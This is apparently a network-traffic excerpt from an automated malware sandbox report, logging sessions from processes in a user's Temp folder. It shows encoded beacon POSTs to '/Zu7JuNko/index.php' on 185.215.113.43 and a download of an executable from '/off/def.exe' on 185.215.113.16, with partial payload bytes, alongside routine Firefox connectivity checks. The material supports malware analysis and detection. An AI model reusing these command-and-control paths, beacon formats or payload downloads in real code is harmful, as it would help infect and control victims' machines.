                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            21192.168.2.449969185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:09.947844982 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:11.348092079 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            22192.168.2.449976185.215.113.16802896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:12.181840897 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529505968 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 2811392
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:40 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10f8-2ae600"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +*`Ui` @ @.rsrc`2@.idata 8@cpzpcpnh**:@ghvclarm @+*@.taggant@`+"*@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529592991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529604912 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529623985 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529643059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529660940 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529673100 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529685974 CET1236INData Raw: bb dc 7a 80 93 b3 7b 47 24 80 79 cf 14 5e a6 90 b8 77 90 60 f9 95 ad 20 c8 ce 4f 4e 62 75 3f 77 fc 58 d5 e4 65 ab f0 a0 4c 03 46 97 75 91 0b 40 29 c9 5b 91 ed da 0e 4d 1b eb 78 4b 2b c1 c2 72 35 d2 6b 81 93 c7 77 a9 ff fe 5a 57 09 f0 78 f0 dd 3b
                                                                                                                                                                                                                                                                                                            Data Ascii: z{G$y^w` ONbu?wXeLFu@)[MxK+r5kwZWx;hdk@A%ic*umC'k~0pElpY+t+IcL{?/Uz'Wio+$J#Fr6O}/a:BFuJq`(+6qq$[ X|Nqwut
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529697895 CET1236INData Raw: af df 61 b7 57 df 65 63 b8 20 d9 96 12 f8 6f 1e da e0 6b 8b 8b 95 4d 6e c9 47 45 87 37 98 75 80 d9 e0 b5 60 bb b8 a9 85 40 d5 f7 0e 30 df a1 80 d9 bc 61 df 8b 84 91 94 85 73 8b ca df f8 8d 69 89 fb d5 ea 12 5c 7e 39 30 58 5d 80 99 cb f5 fe a1 10
                                                                                                                                                                                                                                                                                                            Data Ascii: aWec okMnGE7u`@0asi\~90X]\iYd)*l_'UV:"z?5uGz7)`r-4-WUK%AV\pmWcA39zh/reziE_iJD*\X]iDCY7?]v@`&y@v
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.529715061 CET1236INData Raw: f0 f2 6a 86 8d 90 61 72 f4 a7 31 80 2c 24 70 14 27 d5 63 df e7 cf 45 26 1c b6 b0 a1 86 30 96 24 fe e7 bf d3 25 53 43 44 aa b1 16 75 39 ca b6 29 ea d8 95 b0 17 a5 f2 a2 29 28 8e a2 fa b5 91 ed a1 cf 9d 91 2b b1 a5 bb 20 02 d5 83 9f 6f 4a f3 64 26
                                                                                                                                                                                                                                                                                                            Data Ascii: jar1,$p'cE&0$%SCDu9))(+ oJd&uq_?;B|/<{gF&2YU3~h9@T3|1O?\YjDBklkVa[cG|>GAe*$sH~@o'q+mo
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.650768042 CET1236INData Raw: 18 87 1a 5a c2 f4 00 6b c5 70 06 44 7e d4 43 60 15 cf 7f c0 15 f4 a1 7e 0a e2 1d a6 10 c7 1c 93 15 c4 a7 bc da cb d3 35 95 33 0c c9 f6 05 6e 1e d9 1e 89 87 f0 ba 59 4f d9 2a 72 b4 ff 8b 9d bc 0f b9 9b 85 85 b5 a2 51 5a ff 7c 30 4a a1 90 c5 f9 30
                                                                                                                                                                                                                                                                                                            Data Ascii: ZkpD~C`~53nYO*rQZ|0J0)pCgo$gV$V=PaQ*"UR8NNUm)CVLPm3'iVY]JWUqhpm'=X+dWdU3>c~%({5Yqt-j


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            23192.168.2.44998834.107.221.82805040C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.285099030 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.416711092 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63438
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            24192.168.2.449989185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.637034893 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.036866903 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:15 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            25192.168.2.45000434.107.221.82805040C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.127196074 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.259423971 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51500
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.843703985 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:19.168364048 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51501
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.345587015 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.669209957 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51502
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:22.091002941 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:22.415467978 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51504
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:32.539052963 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.035708904 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.359210014 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51520
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.033638954 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.357559919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51522
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.503808975 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.827672005 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51522
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.983402967 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.307233095 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51523
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.438790083 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.762572050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51523
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.926110983 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
